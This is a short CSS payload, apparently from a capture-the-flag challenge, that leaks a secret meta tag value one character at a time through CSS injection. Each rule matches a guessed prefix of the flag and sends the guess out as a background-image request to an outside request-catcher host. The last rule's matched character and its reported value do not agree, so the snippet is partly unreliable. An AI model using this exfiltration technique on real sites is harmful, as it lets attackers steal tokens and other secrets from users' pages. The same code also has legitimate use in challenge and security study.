html:has(meta[name=secret][content^="cyzi{wa"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=a);
}

html:has(meta[name=secret][content^="cyzi{wb"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=b);
}

/* etc... */

html:has(meta[name=secret][content^="cyzi{w0"]) {
    background-image: url(https://azrael.requestcatcher.com/?secret=w);
}
